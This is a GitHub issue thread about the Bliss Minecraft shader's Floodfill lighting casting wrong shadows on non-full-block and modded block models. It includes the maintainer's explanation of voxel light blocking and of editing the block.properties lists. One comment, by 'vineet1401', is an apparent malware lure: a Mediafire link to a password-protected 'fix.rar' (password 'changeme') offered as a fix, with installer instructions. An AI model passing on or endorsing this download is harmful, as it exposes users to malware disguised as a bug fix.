### ISSUE TITLE
Floodfill incorrect shadows on most custom block models

### ISSUE THREAD

**Issue by DanLCD** [X0nk/Bliss-Shader#286]
### Describe the bug
With Floodfill turned off, custom blocks that are not a full block model render correctly and as expected.
![Floodfill off](https://github.com/user-attachments/assets/9621fce3-426b-4d5a-b4c1-066fb60f6106)
However, when turned on and under artificial light (not sunlight), these blocks begin to almost completely darken up inward, leading to some rather annoying visuals.
![Floodfill on](https://github.com/user-attachments/assets/3e6d175f-5543-4942-b644-587332b0b062)
Some vanilla models appear to be unaffected by this phenomenon, as are these two pots:
![Decorated Pot & Flower Pot with Floodfill on](https://github.com/user-attachments/assets/cdec4231-b0ed-4c7d-9649-47a37e6925d4)
Some others, however, are subject to it. Redstone dust, for example:
![Redstone dust with Floodfill on](https://github.com/user-attachments/assets/125697c8-32e6-4baa-bc71-751a00683fea)
Although it is mainly noticeable with blocks from other mods. 
![Blocks affected and unaffected by this](https://github.com/user-attachments/assets/7ce1bc99-3bd6-4f40-a804-d68a0c1e3a8d)
This only happens with artificial lighting, however, as the blocks are unaffected under sunlight.
![Redstone dust under sunlight](https://github.com/user-attachments/assets/58db0aa9-9302-424e-b88e-167d69177226)
![Custom block (from Macaw's Holidays) under sunlight](https://github.com/user-attachments/assets/d4940485-537a-4dd7-a259-731d9a1b2ba6)
It is not a matter of lighting either, as even if the blocks get a light source next to them the problem persists. Only handheld lights manage to get rid of it.
![Lit redstone lamp with Floodfill on](https://github.com/user-attachments/assets/9165a617-852b-4fc5-a73f-af64dcea3fa5)
![Torch placed with Floodfill on](https://github.com/user-attachments/assets/33e2834b-3f70-44c7-9e77-ddf7662be5c9)
![Handheld torch with Floodfill on](https://github.com/user-attachments/assets/bda34dc5-2a79-42fb-850a-0f97f97a7b97)

### Describe how your minecraft is set up
![2024-08-26_12 52 51](https://github.com/user-attachments/assets/c50594e7-0d76-4f3f-a540-5e8aa604372f)

- What GPU vendor you are using: **Nvidia**
- What operating system you are using: **Windows 11**
- What minecraft version you are playing: **1.21**
- If you are using a special client for minecraft: **No**
- What shader loading mod you are using: **Iris**
- What version of the shader you are using: **Bliss Shader Main**
- If you are using any, what additional mods you are using besides the ones required to use the shader:
  - Distant Horizons
  - MrCrayfish's Furniture Mod: Refurbished
  - Valhelsia Furniture
  - Blockus
  - Chipped
  - Macaw's Holidays
  - Macaw's Doors
  - Light Emitting Diode

### Describe how to reproduce the bug
Turn Floodfill on with everything else in default. Place any block that isn't a full-block model in a space without sunlight and with another placed light source.

**Comment by DanLCD** [comment]
Related: #235 #228 #201 #170

**Comment by DanLCD** [comment]
Would love to see this getting resolved, as these shaders along with Floodlight are such eye candy :)
![2024-08-26_15 46 13](https://github.com/user-attachments/assets/92acbb6a-8f36-4995-bf49-cfc0707f6150)
(this spotlight effect comes from usage of a lvl 0 Light block from vanilla, discovered this accidentally but in retrospective it seems relevant to this issue now lol)
![2024-08-26_15 47 31](https://github.com/user-attachments/assets/ea8ac57b-0744-44bc-a747-6d3244e1f8db)
![2024-08-26_15 49 25](https://github.com/user-attachments/assets/d6789974-8d24-4035-92ad-b62df1b7431d)

**Comment by X0nk** [comment]
To give a little bit of context; for the whole floodfill effect to work, it needs to know what blocks are where, relative to the world.
the shader loader mod (iris/optifine) does not give this information at all, so the shader has to find that data all it by itself. I'm sure you don't want to hear a lengthy explanation of 3d voxel space meticulously checking for something or nothing within the world, so i will just cut to the end

The shader has to manually list what blocks are light sources, and if a block *should not* block light.
by default everything except air, is automatically a light blocking thing. Otherwise, the shader would need to manually list all things that *should* block light. that list is... significantly larger, so that's never gonna happen.

to stop specific blocks from blocking light, you need to manually add those blocks to the list of blocks that *should not* block light
- inside the shader, there is a `block.properties` file. the path is `bliss-shader-main/shaders/block.properties`
- look for a list labeled as `block.50`
- add the block IDs of the blocks you want to let light pass through to that list.
note: there CANNOT be duplicate listings of a single ID, so make sure the ID you list is nowhere else in the entire file.

One other thing, the "voxel space" or 3D grid of the world is atleast 1x1x1 meter/1 block in volume for each grid unit. model shape does not exist in that voxel space. only the voxel shape exists. and that shape is 1 block large. So things that block light, but have had their model changed to be less than 1 block large, will still block light as if its 1 block large, regardless of what the model is.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by IMoist** [comment]
> Related: #235 #228 #201 #170

and #291

**Comment by X0nk** [comment]
yes, all of those are the same issue. some of them have been cleared away simply by putting block ID's in the groups that best fit them, like i explained above

**Comment by djinnbanter** [comment]
Is there a way where and option to be added to just ignore any modded blocks? SEUS PTGI had a similar issue with dark spots/shadows and you can just turn off mod support and treats all modded blocks as air??

**Comment by X0nk** [comment]
not sure if that would be better. if a building was made of modded blocks, the light would go straight through it.
there's more cases of it needing to be blocked than there are cases of it needing to pass through

**Comment by czerag** [comment]
Is there no fix for this still, other than adding custom blocks to the list? Other shaderpacks like Photon do not have this issue, maybe it's worth looking at how it's made there?

**Comment by MikiP98** [comment]
@czerag
Photon just listed everything in block.properties (tag + blocks):  
https://github.com/sixthsurge/photon/blob/4bb8347964e9dec9fb4bb4b076e80065ff5f7298/shaders/block.properties

**Comment by czerag** [comment]
@MikiP98 there's a lot of blocks listed, but there's not "macaw's paths" mod for example. And yet it doesn't produce these shadows

**Comment by MikiP98** [comment]
Then probably macaw's paths are included in one of the used tags.  
Or Photon might just be doing coloured light in a completely different way.

**Comment by czerag** [comment]
That's what I'm trying to say. Maybe it's just completely different. And by looking how, we could get rid of these shadows?

**Comment by czerag** [comment]
Can I somehow add some sort of tags instead of listing all individual blocks IDs? Photon has some tags definition in block.properties, but I have no idea how that works
Edit: nvm, looks like tags are supported on iris 1.8+. I'm using 1.7.6

**Comment by X0nk** [comment]
> That's what I'm trying to say. Maybe it's just completely different. And by looking how, we could get rid of these shadows?

all voxel based shaderpack effects have to do more or less the same thing in the end, they are gonna have to check against lists of IDs to do special cases. theres only one way to do that within iris/optifine, and its with the block.properties file. the most major differences between shaders comes out with the default treatment of unlisted blocks.

my previous explanation of why the shadows appear still stands, and applies somewhat to photon as well if it runs into unlisted blocks.

i plan to start using tags eventually, but sadly they arent a cure all and dont cover every case

**Comment by czerag** [comment]
Alright
In some free time I'll try to add some of 'euphoria patches' block lists to your block lists related to floodfill

**Comment by czerag** [comment]
But in game it **looks like** photon just works differently, as there's less shadows in general. I placed some similar block from vanilla game and modded ones next to each other, and there was no difference. They definitely weren't anywhere on any list, and I can't even find any list related directly to floodfill in photon's code
